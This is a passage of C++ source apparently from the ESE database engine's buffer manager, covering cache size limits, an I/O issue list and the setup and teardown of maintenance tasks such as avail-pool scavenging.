Enforce( cbfCacheNew > 0 );
// do not allow the cache size to exceed the physical limits of the cache / i.e. it
// can't be more than what we can manage
cbfCacheNew = min( (ULONG_PTR)cbfCacheNew, (ULONG_PTR)cCacheChunkMax * (ULONG_PTR)min( g_cbfChunk, g_cpgChunk ) );
Enforce( cbfCacheNew > 0 );
// do not allow the cache size to be below 2 unless we are terming because that
// causes problems with our avail pool thresholds
if ( cbfCacheNew < cbfCacheMinMin )
{
cbfCacheNew = cbfCacheMinMin;
}
Enforce( cbfCacheNew >= cbfCacheMinMin );
// set new cache size target
BFICacheISetTarget( cbfCacheNew );
}
///////////////
// Issue List
CBFIssueList::
CBFIssueList()
: m_pbfilPrev( Ptls()->pbfil ),
m_group( CMeteredSection::groupInvalidNil )
{
Ptls()->pbfil = this;
// this is very questionable ... expects bfil is on the stack ... and stacks "grow" down
Expected( m_pbfilPrev > this || m_pbfilPrev == NULL );
}
CBFIssueList::
~CBFIssueList()
{
Assert( FEmpty() );
// just in case, we're not going to leak memory
while ( CEntry* pentry = m_il.PrevMost() )
{
m_il.Remove( pentry );
delete pentry;
}
if ( m_group >= 0 )
{
s_msSync.Leave( m_group );
}
Assert( Ptls()->pbfil == this );
Ptls()->pbfil = m_pbfilPrev;
}
ERR CBFIssueList::
ErrPrepareWrite( const IFMP ifmp )
{
return ErrPrepareOper( ifmp, CEntry::operWrite );
}
ERR CBFIssueList::
ErrPrepareLogWrite( const IFMP ifmp )
{
return ErrPrepareOper( ifmp, CEntry::operLogWrite );
}
ERR CBFIssueList::
ErrPrepareRBSWrite( const IFMP ifmp )
{
return ErrPrepareOper( ifmp, CEntry::operRBSWrite );
}
ERR CBFIssueList::
ErrIssue( const BOOL fSync )
{
ERR err = JET_errSuccess;
CEntry* pentry = NULL;
while ( pentry = m_il.PrevMost() )
{
switch ( pentry->Oper() )
{
case CEntry::operWrite:
Call( g_rgfmp[ pentry->Ifmp() ].Pfapi()->ErrIOIssue() );
break;
case CEntry::operLogWrite:
(void)ErrBFIWriteLog( pentry->Ifmp(), fSync );
break;
case CEntry::operRBSWrite:
// We can ignore error because ErrBFIPrepareFlushPage() double checks the next time
// we try to flush a page
Assert( g_rgfmp[ pentry->Ifmp() ].FRBSOn() );
(void)g_rgfmp[ pentry->Ifmp() ].PRBS()->ErrFlushAll();
break;
default:
AssertSz( fFalse, "Unknown CBFIssueList pentry->Oper() = %d, unissued!\n", pentry->Oper() );
}
m_il.Remove( pentry );
delete pentry;
}
if ( m_group >= 0 )
{
s_msSync.Leave( m_group );
m_group = CMeteredSection::groupInvalidNil;
}
Assert( FEmpty() );
// pass back a warning wrnBFINothingToFlush?
HandleError:
return err;
}
VOID CBFIssueList::
AbandonLogOps()
{
CEntry* pentry = NULL;
while ( pentry = m_il.PrevMost() )
{
switch ( pentry->Oper() )
{
// We will not hit CEntry::operWrite here as this function is only called by ErrBFIFlushPage while fOpportune is false.
// So no opportunistic writes will happen. Ref to ErrBFIFlushPage and ErrBFIPrepareFlushPage code for more detail.
case CEntry::operLogWrite:
case CEntry::operRBSWrite:
break;
default:
AssertSz( fFalse, "Unexpected CBFIssueList pentry->Oper() = %d, unissued!\n", pentry->Oper() );
}
m_il.Remove( pentry );
delete pentry;
}
if ( m_group >= 0 )
{
s_msSync.Leave( m_group );
m_group = CMeteredSection::groupInvalidNil;
}
Expected( FEmpty() );
}
ERR CBFIssueList::
ErrSync()
{
#ifdef DEBUG
CBFIssueList * pbfil = Ptls()->pbfil;
while( pbfil )
{
Assert( pbfil->FEmpty() );
Assert( pbfil->m_group == CMeteredSection::groupInvalidNil );
pbfil = pbfil->m_pbfilPrev;
}
#endif
s_critSync.Enter();
s_msSync.Partition();
s_critSync.Leave();
return JET_errSuccess;
}
ERR CBFIssueList::
ErrPrepareOper( const IFMP ifmp, const CEntry::eOper oper )
{
ERR err = JET_errSuccess;
CEntry* pentry = NULL;
CEntry* pentryNew = NULL;
if ( m_group < 0 )
{
m_group = s_msSync.Enter();
}
for ( pentry = m_il.PrevMost(); pentry; pentry = m_il.Next( pentry ) )
{
if ( pentry->Ifmp() == ifmp && pentry->Oper() == oper )
{
pentry->IncRequests();
Error( JET_errSuccess );
}
}
Alloc( pentryNew = new CEntry( ifmp, oper ) );
m_il.InsertAsNextMost( pentryNew );
pentryNew = NULL;
HandleError:
delete pentryNew;
return err;
}
BOOL CBFIssueList::FEmpty() const
{
return m_il.PrevMost() == NULL;
}
VOID CBFIssueList::NullifyDiskTiltFake( const IFMP ifmp )
{
CEntry * pentry = m_il.PrevMost();
if ( pentry )
{
// if there is only one oper, and it's write oper for this IFMP, and we've only had
// one request we can assume it's the fake write oper for the disk tilt oper. This
// is kind of a fragile way to do this.
if ( m_il.Next( pentry ) == NULL &&
pentry->Oper() == CEntry::operWrite &&
pentry->Ifmp() == ifmp &&
pentry->CRequests() == 1 )
{
AssertRTL( PefLastThrow() && PefLastThrow()->Err() == errDiskTilt );
Assert( pentry == m_il.PrevMost() ); // should be no concurrency concerns
m_il.Remove( pentry );
delete pentry;
Assert( FEmpty() ); // our issue list should now be empty.
// let the .dtor take care of the partition
}
else
{
AssertSz( fFalse, "Client shouldn't be calling with these args / state" );
}
}
}
CCriticalSection CBFIssueList::s_critSync( CLockBasicInfo( CSyncBasicInfo( _T( "CBFIssueList::s_critSync" ) ), rankBFIssueListSync, 0 ) );
CMeteredSection CBFIssueList::s_msSync;
////////////////
// Maintenance
// The two variables below are set when g_semMaintCacheSize is acquired (i.e., cache sizing officially starts) and reset
// when g_semMaintCacheSize is released. g_semMaintCacheSize is held all the way through until the cache resizing achieves
// its aim (which may be several reschedulings of the shrink task). g_tickMaintCacheSizeStartedLast is used to calculate
// cache size duration (for perf. counters and also shrink aggressiveness), while g_cbfMaintCacheSizeStartedLast is used
// only to calculate shrink aggressiveness. Note that because they are consumed without a lock, g_tickMaintCacheSizeStartedLast
// is set to the current time when cache sizing ends so that if we evaluate them during the transition, we don't incur the
// risk of computing a very large shrink urgency (due to unreasonably high shrink duration).
LOCAL volatile TICK g_tickMaintCacheSizeStartedLast = 0; // last time cache sizing started
LOCAL volatile LONG_PTR g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive; // cache size at the time the last cache sizing started
LOCAL TICK g_tickLastMaintCacheStats = 0; // last time a cache statistics maintenance task was executed
LOCAL TICK g_tickLastCacheStatsRequest = 0; // last time a cache statistics maintenance task was requested
LOCAL TICK g_tickLastMaintCacheSize = 0; // last time a cache size maintenance task was executed
HMEMORY_NOTIFICATION g_pMemoryNotification = NULL;
// Init / Term
LOCAL CBinaryLock g_blBFMaintScheduleCancel( CLockBasicInfo( CSyncBasicInfo( _T( "BFMaint Schedule/Cancel" ) ), rankBFMaintScheduleCancel, 0 ) );
LOCAL volatile BOOL g_fBFMaintInitialized = fFalse;
ERR ErrBFIMaintInit()
{
ERR err = JET_errSuccess;
Assert( !g_fBFMaintInitialized );
// Initialize task time tracking variables
g_tickLastCacheStatsRequest = TickOSTimeCurrent();
// Init scavenging and avail pool maintenance
cbfCacheDeadlock = 0;
g_cbfCacheDeadlockMax = 0;
Call( ErrBFIMaintScavengeInit() );
// Allocate timer tasks first, since timers can reschedule each other
Call( ErrOSTimerTaskCreate( BFIMaintIdleDatabaseITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintIdleDatabaseITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCacheResidencyITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCacheResidencyITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintIdleCacheStatsITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintIdleCacheStatsITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCacheStatsITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCacheStatsITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintTelemetryITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintTelemetryITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCacheSizeITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCacheSizeITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCheckpointITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCheckpointITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCheckpointDepthITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCheckpointDepthITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintAvailPoolIUrgentTask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintAvailPoolIUrgentTask ) );
Call( ErrOSTimerTaskCreate( BFIMaintAvailPoolITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintAvailPoolITask ) );
Call( ErrOSCreateLowMemoryNotification(
BFIMaintLowMemoryCallback,
NULL,
&g_pMemoryNotification ) );
g_semMaintAvailPoolRequestUrgent.Release();
g_semMaintAvailPoolRequest.Release();
g_semMaintScavenge.Release();
// init checkpoint depth maintenance
g_ifmpMaintCheckpointDepthStart = 0;
g_semMaintCheckpointDepthRequest.Release();
// init checkpoint maintenance
g_tickMaintCheckpointLast = TickOSTimeCurrent();
g_semMaintCheckpointRequest.Release();
// init cache size maintenance
g_tickLastMaintCacheStats = TickOSTimeCurrent() - dtickMaintCacheStatsTooOld;
BFIMaintCacheStatsRelease();
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive;
g_cMaintCacheSizePending = 0;
Assert( g_semMaintCacheSize.CAvail() == 0 );
g_semMaintCacheSize.Release();
BFIMaintCacheResidencyInit();
// init idle database maintenance
g_tickMaintIdleDatabaseLast = TickOSTimeCurrent();
g_semMaintIdleDatabaseRequest.Release();
// WARNING: any tasks kicked off by this function must be scheduled after the setting
// of the flag below, otherwise, they will fail the scheduling
g_fBFMaintInitialized = fTrue;
// WARNING: can't fail from this point forward because this component is considered initialized.
CallS( ErrBFIMaintCacheStatsRequest( bfmcsrtForce ) ); // OSTimerTask tasks never fail scheduling besides when the task quiescing
// signals are set (which isn't the case here).
// start telemetry maintenance
BFIMaintTelemetryRequest();
#if 0 // Hashed latches are permanently disabled.
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// init hashed latch maintenance
g_fBFMaintHashedLatches = fFalse;
#ifdef DEBUG
const INT cMinProcsForHashedLatches = 1;
#else
const INT cMinProcsForHashedLatches = 2;
#endif
#pragma prefast( suppress:6237, "The rest of the conditions do not have any side effects." )
if ( fFalse && // disable this maintenance task permanently
!FJetConfigLowMemory() &&
!FJetConfigMedMemory() &&
!FJetConfigLowPower() &&
OSSyncGetProcessorCountMax() >= cMinProcsForHashedLatches )
{
g_fBFMaintHashedLatches = fTrue;
Call( ErrBFIMaintScheduleTask( BFIMaintHashedLatchesITask,
NULL,
dtickMaintHashedLatchesPeriod,
dtickMaintHashedLatchesPeriod ) );
}
#endif // MINIMAL_FUNCTIONALITY
#endif // 0
HandleError:
if ( err < JET_errSuccess )
{
Assert( !g_fBFMaintInitialized );
BFIMaintTerm();
}
else
{
Assert( g_fBFMaintInitialized );
}
return err;
}
void BFIMaintTerm()
{
// only allow task cancelation during term
g_blBFMaintScheduleCancel.Enter2();
// term idle database maintenance
if ( g_posttBFIMaintIdleDatabaseITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintIdleDatabaseITask );
}
(void)g_semMaintIdleDatabaseRequest.FTryAcquire();
// term cache size maintenance
BFIMaintCacheResidencyTerm();
if ( g_posttBFIMaintIdleCacheStatsITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintIdleCacheStatsITask );
}
if ( g_posttBFIMaintCacheStatsITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCacheStatsITask );
}
if ( g_posttBFIMaintTelemetryITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintTelemetryITask );
}
// delete memory notification after cache stats since cache stats can
// use memory notification while quiescing itself
if ( g_pMemoryNotification != NULL )
{
OSUnregisterAndDestroyMemoryNotification( g_pMemoryNotification );
g_pMemoryNotification = NULL;
}
Assert( g_semMaintCacheSize.CAvail() <= 1 );
if ( g_posttBFIMaintCacheSizeITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCacheSizeITask );
}
Assert( g_semMaintCacheSize.CAvail() <= 1 );
(void)FBFIMaintCacheStatsTryAcquire();
Assert( g_semMaintCacheSize.CAvail() <= 1 );
(void)g_semMaintCacheSize.FTryAcquire();
Assert( g_semMaintCacheSize.CAvail() == 0 );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#if 0 // Hashed latches are permanently disabled.
// term hashed latch maintenance
(void)ErrBFIMaintCancelTask( BFIMaintHashedLatchesITask );
g_fBFMaintHashedLatches = fFalse;
#endif // 0
#endif // MINIMAL_FUNCTIONALITY
// term checkpoint maintenance
if ( g_posttBFIMaintCheckpointITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCheckpointITask );
}
(void)g_semMaintCheckpointRequest.FTryAcquire();
// term checkpoint depth maintenance
if ( g_posttBFIMaintCheckpointDepthITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCheckpointDepthITask );
}
(void)g_semMaintCheckpointDepthRequest.FTryAcquire();
// term scavenging and avail pool maintenance
if ( g_posttBFIMaintAvailPoolIUrgentTask )
{
OSTimerTaskCancelTask( g_posttBFIMaintAvailPoolIUrgentTask );
}
if ( g_posttBFIMaintAvailPoolITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintAvailPoolITask );
}
(void)g_semMaintAvailPoolRequestUrgent.FTryAcquire();
(void)g_semMaintAvailPoolRequest.FTryAcquire();
(void)g_semMaintScavenge.FTryAcquire();
BFIMaintScavengeTerm();
// delete objects, which is done here in case there are cross-references
// between tasks, so the code above will quiesce them all and the code
// below will delete the objects
if ( g_posttBFIMaintIdleDatabaseITask )
{
OSTimerTaskDelete( g_posttBFIMaintIdleDatabaseITask );
g_posttBFIMaintIdleDatabaseITask = NULL;
}
if ( g_posttBFIMaintCacheResidencyITask )
{
OSTimerTaskDelete( g_posttBFIMaintCacheResidencyITask );
g_posttBFIMaintCacheResidencyITask = NULL;
}
if ( g_posttBFIMaintIdleCacheStatsITask )
{
OSTimerTaskDelete( g_posttBFIMaintIdleCacheStatsITask );
g_posttBFIMaintIdleCacheStatsITask = NULL;
}
if ( g_posttBFIMaintCacheStatsITask )
{
OSTimerTaskDelete( g_posttBFIMaintCacheStatsITask );
g_posttBFIMaintCacheStatsITask = NULL;
}
if ( g_posttBFIMaintTelemetryITask )
{
OSTimerTaskDelete( g_posttBFIMaintTelemetryITask );
g_posttBFIMaintTelemetryITask = NULL;
}
if ( g_posttBFIMaintCacheSizeITask )
{
OSTimerTaskDelete( g_posttBFIMaintCacheSizeITask );
g_posttBFIMaintCacheSizeITask = NULL;
}
if ( g_posttBFIMaintCheckpointITask )
{
OSTimerTaskDelete( g_posttBFIMaintCheckpointITask );
g_posttBFIMaintCheckpointITask = NULL;
}
if ( g_posttBFIMaintCheckpointDepthITask )
{
OSTimerTaskDelete( g_posttBFIMaintCheckpointDepthITask );
g_posttBFIMaintCheckpointDepthITask = NULL;
}
if ( g_posttBFIMaintAvailPoolIUrgentTask )
{
OSTimerTaskDelete( g_posttBFIMaintAvailPoolIUrgentTask );
g_posttBFIMaintAvailPoolIUrgentTask = NULL;
}
if ( g_posttBFIMaintAvailPoolITask )
{
OSTimerTaskDelete( g_posttBFIMaintAvailPoolITask );
g_posttBFIMaintAvailPoolITask = NULL;
}
// all tasks are now shutdown so release cancel lock
g_fBFMaintInitialized = fFalse;
g_blBFMaintScheduleCancel.Leave2();
}
// preferred
ERR ErrBFIMaintScheduleTask( POSTIMERTASK postt,
const VOID * const pvContext,
const TICK dtickDelay,
const TICK dtickSlop )
{
ERR err = JET_errSuccess;
BOOL fLeave1 = fFalse;
// in order to schedule a new task, we must be able to enter this lock as
// a scheduler
if ( !g_blBFMaintScheduleCancel.FTryEnter1() )
{
Error( ErrERRCheck( JET_errNotInitialized ) );
}
fLeave1 = fTrue;
if ( !g_fBFMaintInitialized )
{
FireWall( "ScheduleMaintUninitTimerTask" );
Error( ErrERRCheck( JET_errNotInitialized ) );
}
OSTimerTaskScheduleTask( postt, pvContext, dtickDelay, dtickSlop );
HandleError:
if ( fLeave1 )
{
g_blBFMaintScheduleCancel.Leave1();
}
return err;
}
// Concurrency simulation
// perhaps make global turn this on from registry?
//#define BF_CC_SIM 1
INLINE BOOL FBFIChance( INT pctChance )
{
#ifdef BF_CC_SIM
return ( rand() % 100 ) < pctChance;
#else
return fFalse;
#endif
}
// incures a random wait or task switch ...
INLINE void BFISynchronicity( void )
{
#ifdef BF_CC_SIM
if ( FBFIChance( 10 ) )
{
// 10% chance to switch to ready thread at same priority
UtilSleep( 0 );
}
else if ( FBFIChance( 10 ) )
{
// 9% chance to switch to any ready thread
UtilSleep( 1 );
}
else if ( FBFIChance( 10 ) )
{
// 8% chance ... broken down ...
if ( FBFIChance( 25 ) )
{
while ( FBFIChance( 50 ) )
{
// 1% sleep once 16 ms, .5% sleep 32 ms, .25% sleep 48 ms, so on ...
UtilSleep( 16 );
}
}
else
{
// 2% sleep 2 ms, 2% sleep 3 ms, 2% sleep 4 ms.
UtilSleep( rand() % 4 + 2 );
}
}
// else 73% chance to do nothing ...
#endif
}
// Avail Pool
CSemaphore g_semMaintAvailPoolRequestUrgent( CSyncBasicInfo( _T( "g_semMaintAvailPoolRequestUrgent" ) ) );
CSemaphore g_semMaintAvailPoolRequest( CSyncBasicInfo( _T( "g_semMaintAvailPoolRequest" ) ) );
LONG_PTR cbfAvailPoolLow;
LONG_PTR cbfAvailPoolHigh;
LONG_PTR cbfAvailPoolTarget;
LONG_PTR cbfCacheDeadlock;
LONG_PTR g_cbfCacheDeadlockMax;
POSTIMERTASK g_posttBFIMaintAvailPoolIUrgentTask = NULL;
POSTIMERTASK g_posttBFIMaintAvailPoolITask = NULL;
// requests that maintenance be performed on the avail pool in either sync or
// async mode
ERR ErrBFIMaintAvailPoolRequest( const BFIMaintAvailPoolRequestType bfmaprt )
{
const BOOL fForceSync = ( bfmaprtSync == bfmaprt ); // technically not forced as has to acquire g_semMaintScavenge
const BOOL fAllowSync = ( bfmaprtAsync != bfmaprt );
BOOL fRequestAsync = !fForceSync;
ERR err = JET_errSuccess;
OnDebug( BOOL fExecutedSync = fFalse );
// all these flags are exclusive ...
Assert( ( bfmaprtUnspecific == bfmaprt ) || ( bfmaprtSync == bfmaprt ) || ( bfmaprtAsync == bfmaprt ) );
Assert( !fForceSync || fAllowSync );
// ignore the request if we have enough available BFs and the deadlock threshold is not over the optimal cache size
// note that we don't have the proper locks to ensure consistent cbfCacheDeadlock and g_cbfCacheTargetOptimal values, which
// is acceptable because new requests will come in as new pages are allocated so we'll eventually do the right thing.
const DWORD cbfAvail = g_bfavail.Cobject();
if ( ( cbfAvail >= (DWORD)cbfAvailPoolHigh ) && ( cbfCacheDeadlock <= g_cbfCacheTargetOptimal ) )
{
goto HandleError;
}
const BOOL fSmallPool = ( ( cbfAvailPoolHigh - cbfAvailPoolLow ) < 10 ) || ( cbfAvailPoolLow < 5 );
const BOOL fLowPool = ( cbfAvail <= (DWORD)cbfAvailPoolLow );
if ( fForceSync || ( fAllowSync && fSmallPool && fLowPool ) )
{
// if no one else is currently maintaining the avail pool then we can proceed
if ( g_semMaintScavenge.FTryAcquire() )
{
// maintain the avail pool
//
// NOTE: we disable sync debugging below because we are logically
// becoming another context and the sync library is not flexible enough to
// understand this
// but I'm not sure this is correct ... it depends upon where we become
// another thread from ... as an example this stack ...
// has checkpoint locks ... and then tried to clear an OB0.
//
// TID 0x16b8 is a waiter for CReaderWriterLock 0x0000000052FC04E0 ( "CDynamicHashTable::BUCKET[0x0000000000000016]::m_rwlBucket", 65, 0 ) as Group 0.
// TID 0x16b8 is an owner of CSXWLatch 0x0000000002D34A20 ( "BFLatch Read/RDW/Write", 1000, 2147483647 ) as Group 2.
// TID 0x16b8 is an owner of CReaderWriterLock 0x0000000052FC04E0 ( "CDynamicHashTable::BUCKET[0x0000000000000016]::m_rwlBucket", 65, 0 ) as Group 0.
// TID 0x16b8 is an owner of CReaderWriterLock 0x00000000003D6F08 ( "BFFMPContext Updating/Accessing", 66, 0 ) as Group 1.
//
// Child-SP RetAddr Call Site
// 00000000`5486d028 000007fe`f2ed295e KERNELBASE!DebugBreak+0x2
// 00000000`5486d030 000007fe`f2ed3408 ese!UserDebugBreakPoint+0x45e [d:\src\e13\esefastdev1\sources\dev\ese\src\os\error.cxx @ 281]
// 00000000`5486dd30 000007fe`f2df2696 ese!AssertFail+0x978 [d:\src\e13\esefastdev1\sources\dev\ese\src\os\error.cxx @ 655]
// 00000000`5486df50 000007fe`f2ded386 ese!OSSYNC::CKernelSemaphore::FAcquire+0xe6 [d:\src\e13\esefastdev1\sources\dev\ese\src\sync\sync.cxx @ 4002]
// 00000000`5486dfb0 000007fe`f2a81299 ese!OSSYNC::CSemaphore::_FAcquire+0x206 [d:\src\e13\esefastdev1\sources\dev\ese\src\sync\sync.cxx @ 424]
// 00000000`5486e080 000007fe`f2a81239 ese!OSSYNC::CSemaphore::FAcquire+0x29 [d:\src\e13\esefastdev1\sources\dev\ese\published\inc\sync.hxx @ 2003]
// 00000000`5486e0c0 000007fe`f2df0daa ese!OSSYNC::CSemaphore::Acquire+0x19 [d:\src\e13\esefastdev1\sources\dev\ese\published\inc\sync.hxx @ 1961]
// 00000000`5486e100 000007fe`f2aa5e99 ese!OSSYNC::CReaderWriterLock::_EnterAsWriter+0x7a [d:\src\e13\esefastdev1\sources\dev\ese\src\sync\sync.cxx @ 2534]
// 00000000`5486e130 000007fe`f2abeb89 ese!OSSYNC::CReaderWriterLock::EnterAsWriter+0x189 [d:\src\e13\esefastdev1\sources\dev\ese\published\inc\sync.hxx @ 5759]
// 00000000`5486e170 000007fe`f2abcea2 ese!DHT::CDynamicHashTable<unsigned long,COLL::CApproximateIndex<unsigned long,RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory,&RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory::OffsetOfAIIC>::CBucket>::FDIRTryWriteLockKey+0x199 [d:\src\e13\esefastdev1\distrib\private\inc\dht.hxx @ 1005]
// 00000000`5486e200 000007fe`f2ab62f9 ese!DHT::CDynamicHashTable<unsigned long,COLL::CApproximateIndex<unsigned long,RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory,&RESMGR::CLRUKResourceUtilityManager<2,BF,&BF::OffsetOfLRUKIC,IFMPPGNO>::CHistory::OffsetOfAIIC>::CBucket>::FTryWriteLockKey+0xc2 [d:\src\e13\esefastdev1\distrib\private\inc\dht.hxx @ 4004]
// 00000000`5486e250 000007fe`f2aaef19 ese!COLL::CApproximateIndex<unsigned __int64,BF,&BF::OffsetOfOB0IC>::FTryLockKeyPtr+0x59 [d:\src\e13\esefastdev1\distrib\private\inc\collection.hxx @ 1162]
// 00000000`5486e290 000007fe`f2aa8ab8 ese!COLL::CApproximateIndex<unsigned __int64,BF,&BF::OffsetOfOB0IC>::LockKeyPtr+0x39 [d:\src\e13\esefastdev1\distrib\private\inc\collection.hxx @ 1144]
// 00000000`5486e2e0 000007fe`f2aa1721 ese!BFIResetLgposOldestBegin0+0x1a8 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 19324]
// 00000000`5486e410 000007fe`f2a84d37 ese!ErrBFIEvictPage+0x521 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16937]
// 00000000`5486e5c0 000007fe`f2a83199 ese!ErrBFIMaintScavengeIScavengePages+0x1b7 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 7956]
// 00000000`5486e810 000007fe`f2a92410 ese!ErrBFIMaintAvailPoolRequest+0xe9 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 7516]
// 00000000`5486e880 000007fe`f2a77ea1 ese!ErrBFIAllocPage+0xf0 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 11881]
// 00000000`5486e8f0 000007fe`f2a7806b ese!BFIAlloc+0x161 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 3061]
// 00000000`5486e960 000007fe`f2b695c0 ese!BFAlloc+0x3b [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 3115]
// 00000000`5486e990 000007fe`f2b6a38a ese!CPAGE::ReorganizeData_+0xa0 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\cpage.cxx @ 4181]
// 00000000`5486ea30 000007fe`f2aa2f91 ese!CPAGE::DehydratePage+0x1fa [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\cpage.cxx @ 4499]
// 00000000`5486eaf0 000007fe`f2aa2b80 ese!BFIDehydratePage+0x371 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 17523]
// 00000000`5486eba0 000007fe`f2aa7706 ese!BFICleanPage+0x580 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 17417]
// 00000000`5486ec10 000007fe`f2aa0b0a ese!BFIFlushComplete+0x2d6 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 18674]
// 00000000`5486ecd0 000007fe`f2a9ec6a ese!FBFICompleteFlushPage+0x8a [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16654]
// 00000000`5486ed10 000007fe`f2aa05fa ese!ErrBFIAcquireExclusiveLatchForFlush+0x5a [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16114]
// 00000000`5486ed50 000007fe`f2a8b2d4 ese!ErrBFIFlushPage+0xaa [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 16584]
// 00000000`5486ee00 000007fe`f2a8bcf3 ese!ErrBFIOB0MaintEntry+0x354 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9575]
// 00000000`5486ee90 000007fe`f2a8ca45 ese!ErrBFIOB0MaintScan+0x703 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9756]
// 00000000`5486ef90 000007fe`f2a8a4be ese!ErrBFIMaintCheckpointDepthIFlushPagesByIFMP+0x935 [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 10196]
// 00000000`5486f370 000007fe`f2a89fba ese!BFIMaintCheckpointDepthIFlushPages+0x2ae [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9206]
// 00000000`5486f420 000007fe`f2eefe7e ese!BFIMaintCheckpointDepthITask+0x8a [d:\src\e13\esefastdev1\sources\dev\ese\src\ese\bf.cxx @ 9103]
//
// We should re-enable this deadlock detection in the future and determine
// what are the real problems behind here ... and see if they can be fixed
// more elegantly.
//
CLockDeadlockDetectionInfo::DisableOwnershipTracking();
CLockDeadlockDetectionInfo::DisableDeadlockDetection();
if ( fForceSync )
{
err = ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fTrue );
}
else
{
(void)ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fFalse );
}
OnDebug( fExecutedSync = fTrue );
CLockDeadlockDetectionInfo::EnableDeadlockDetection();
CLockDeadlockDetectionInfo::EnableOwnershipTracking();
g_semMaintScavenge.Release();
// because we just performed maintenance, we can rule out the
// need to perform it async
fRequestAsync = fFalse;
}
}
// if we still need to maintain the avail pool then try to schedule an attempt in the near future
if ( fRequestAsync )
{
const BOOL fUrgent = fLowPool;
CSemaphore* const psemMaintAvailPoolRequest = fUrgent ? &g_semMaintAvailPoolRequestUrgent : &g_semMaintAvailPoolRequest;
if ( psemMaintAvailPoolRequest->FTryAcquire() )
{
const ERR errSchedule = fUrgent ?
ErrBFIMaintScheduleTask( g_posttBFIMaintAvailPoolIUrgentTask, NULL, dtickMaintAvailPoolRequestUrgent, 0 ) :
ErrBFIMaintScheduleTask( g_posttBFIMaintAvailPoolITask, NULL, dtickMaintAvailPoolRequest, 0 );
if ( errSchedule < JET_errSuccess )
{
psemMaintAvailPoolRequest->Release();
}
}
}
HandleError:
#ifdef DEBUG
if ( err != JET_errSuccess )
{
Expected( fForceSync && fExecutedSync );
Expected( ( err == wrnSlow ) || ( err == JET_errOutOfBuffers ) || ( err == JET_errOutOfMemory ) );
}
#endif
return err;
}
// executes the actual task to maintain the avail pool
void BFIMaintAvailPoolITask_( CSemaphore* const psemMaintAvailPoolRequest )
{
// this task automatically has the right to async maintenance
Assert( psemMaintAvailPoolRequest->CAvail() == 0 );
// if no one else is currently scavenging then we can
// proceed. otherwise, this async request will be ignored
if ( g_semMaintScavenge.FTryAcquire() )
{
// scavenge
(void)ErrBFIMaintScavengeIScavengePages( __FUNCTION__, fFalse );
g_semMaintScavenge.Release();
}
Assert( psemMaintAvailPoolRequest->CAvail() == 0 );
psemMaintAvailPoolRequest->Release();
}
// executes an urgent async request to maintain the avail pool
void BFIMaintAvailPoolIUrgentTask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
BFIMaintAvailPoolITask_( &g_semMaintAvailPoolRequestUrgent );
}
// executes an async request to maintain the avail pool
void BFIMaintAvailPoolITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
BFIMaintAvailPoolITask_( &g_semMaintAvailPoolRequest );
}
// Scavenging
